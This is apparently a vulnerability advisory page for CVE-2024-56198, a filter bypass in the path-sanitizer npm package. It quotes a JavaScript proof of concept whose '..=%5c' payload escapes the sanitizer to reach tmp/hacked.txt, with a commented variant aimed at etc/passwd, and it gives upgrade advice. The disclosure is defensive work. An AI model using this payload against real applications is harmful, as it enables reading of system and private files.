CVE-2024-56198

描述

### Summary This is a POC for a path-sanitizer [npm package](https://www.npmjs.com/package/path-sanitizer). The filters can be bypassed and can result in path traversal. Payload: `..=%5c` can be used to bypass this on CLI (along with other candidates). Something similar would likely work on web apps as well. ### PoC Here's the code to test for the filter bypass: ```js const sanitize = require("path-sanitizer") const path = require("path") const fs = require("fs") // Real scenario: function routeHandler(myPath) { // Lets just assume that the path was extracted from the request // We want to read a file in the C:\Users\user\Desktop\myApp\ directory // But the user should be able to access C:\Users\user\Desktop\ // So we need to sanitize the path const APP_DIR = "/var/hacker" const sanitized = path.join(APP_DIR, sanitize(myPath)) // Now we would usally read the file // But in this case we just gonna print the path // console.log(sanitized) return sanitized } function readFile(filePath) { const absolutePath = path.resolve(filePath) // Resolve to absolute path fs.readFile(absolutePath, "utf8", (err, data) => { if (err) { console.error(`Error reading the file: ${err.message}`) return } console.log(`Contents of the file ${filePath} :\n${data}`) }) } input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt" // input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd" input_user_payload = "../../../../../../../../tmp/hacked.txt" readFile(routeHandler(input_user_bypass)) readFile(routeHandler(input_user_payload)) ``` Here is a video POC: (this is a Loom POC, only users with the UUID of the video can see it) https://www.loom.com/share/b766ece5193842848ce7562fcd559256?sid=fd826eb6-0eee-4601-bf0e-9cfee5c56e9d ### Impact Any CLI tool or library using this package can be/will be vulnerable to Path traversal.

如何修補 CVE-2024-56198

要修補 CVE-2024-56198,請將受影響套件升級到下列已修補版本。

• —升級至 3.1.0 或更新版本

CVE-2024-56198 正在被利用嗎?

低 — EPSS 為 0.8%,目前沒有觀察到大規模利用活動。

受影響套件(1)